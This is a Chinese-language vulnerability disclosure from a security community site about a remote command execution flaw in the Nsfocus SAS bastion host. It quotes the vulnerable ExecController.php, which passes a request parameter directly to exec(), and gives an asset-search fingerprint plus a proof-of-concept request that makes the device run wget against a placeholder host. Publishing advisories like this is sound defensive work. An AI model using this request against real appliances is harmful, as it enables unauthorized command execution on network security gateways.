奇安信攻防社区-Nsfocus SAS堡垒机 Exec 远程命令执行漏洞

Nsfocus SAS堡垒机 Exec 远程命令执行漏洞

# Nsfocus SAS堡垒机 Exec 远程命令执行漏洞 ## 漏洞描述 Nsfocus SAS堡垒机 Exec 远程命令执行漏洞 ## 漏洞影响 Nsfocus SAS堡垒机 ## 网络测绘 body="'/needUsbkey.ph...

Nsfocus SAS堡垒机 Exec 远程命令执行漏洞
============================

漏洞描述
----

Nsfocus SAS堡垒机 Exec 远程命令执行漏洞

漏洞影响
----

Nsfocus SAS堡垒机

网络测绘
----

body="'/needUsbkey.php?username='"

漏洞复现
----

登陆页面

![img](https://shs3.b.qianxin.com/butian_public/f78631193b748143ce2b6ddb25f091da07be46429d992.jpg)

漏洞存在于文件 ExecController.php 文件中

![img](https://shs3.b.qianxin.com/butian_public/f143884f699a7d496e4fc4e00b0eb86236bc9a239248d.jpg)

```php
<?php
  require_once 'Nsc/Websvc/Response.php';
class ExecController extends Cavy_Controller_Action {

var $models = 'no';

public function index() {
    $command = $this->_params['cmd'];
    $ret = 0;
    $output = array();
    exec($command,$output,$ret);
    $result = new StdClass;
    if ($ret != 0) {
      $result->code = Nsc_Websvc_Response::EXEC_ERROR;
      $result->text = "exec error";
    }
    else {
      $result->code = Nsc_Websvc_Response::SUCCESS;
      //            $result->text = implode("\n",$output);
      $result->text = "WEBSVC OK";
    }
    $this->_render(array('result'=>$result),'/websvc/result');
  }
}
?>
```

验证POC

```php
/webconf/Exec/index?cmd=wget%20xxx.xxx.xxx
```

![img](https://shs3.b.qianxin.com/butian_public/f8363653c5d8af9ab2a3bf0c7f20c2273bad4bb89ad65.jpg)

![img](https://shs3.b.qianxin.com/butian_public/f8026177b6d361c6b03238cfb8e6435dd840c51bbb751.jpg)

发表于 2024-07-12 18:46:31
阅读 ( 978 )
分类：Web应用

Nsfocus SAS堡垒机 Exec 远程命令执行漏洞

0 条评论